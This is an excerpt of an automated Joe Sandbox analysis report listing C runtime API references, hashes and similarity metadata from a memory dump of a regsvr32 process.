                                                                                                                                                                  • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1551663144-0
                                                                                                                                                                  • Opcode ID: b755127628fdf4c1f989ceecb6dcea50f5cb8fd082aa61857ceb91876b8fed8c
                                                                                                                                                                  • Instruction ID: 863f5976dc6ed77e78d5465c7964831340df37a61b6de166e83a27336d6dff06
                                                                                                                                                                  • Opcode Fuzzy Hash: b755127628fdf4c1f989ceecb6dcea50f5cb8fd082aa61857ceb91876b8fed8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF0963290D73199F654EB74AE01A4BAA949F0F63CB210E2DE7B4D50D4FF15A44181F6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsnlen
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                                                                                  • Opcode ID: 0768a93f5c8c2d00117fda8448dd4fc65d512c89acc6998383660b70507daa8e
                                                                                                                                                                  • Instruction ID: 7235c38bad45884b99d751feccd1cf96880e050039c0e953d75fc3da7dd8ffbb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0768a93f5c8c2d00117fda8448dd4fc65d512c89acc6998383660b70507daa8e
                                                                                                                                                                  • Instruction Fuzzy Hash: 62210E32948118AAEB00CBA49C45F7AF3ACDB4F779F504865FA58D6180FB71F94086E5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _malloc.LIBCMT ref: 67D3F774
                                                                                                                                                                    • Part of subcall function 67D34E76: __FF_MSGBANNER.LIBCMT ref: 67D34E8D
                                                                                                                                                                    • Part of subcall function 67D34E76: __NMSG_WRITE.LIBCMT ref: 67D34E94
                                                                                                                                                                    • Part of subcall function 67D34E76: RtlAllocateHeap.NTDLL(67DA59B8,00000000,00000001), ref: 67D34EB9
                                                                                                                                                                  • _free.LIBCMT ref: 67D3F787
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap_free_malloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1020059152-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 67D4CB95
                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 67D4CBC3
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 67D4CBF1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 67D4CC27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___BuildCatchObject.LIBCMT ref: 67D3633B
                                                                                                                                                                    • Part of subcall function 67D36A30: ___BuildCatchObjectHelper.LIBCMT ref: 67D36A62
                                                                                                                                                                    • Part of subcall function 67D36A30: ___AdjustPointer.LIBCMT ref: 67D36A79
                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 67D36352
                                                                                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 67D36364
                                                                                                                                                                  • CallCatchBlock.LIBCMT ref: 67D36388
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2901542994-0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%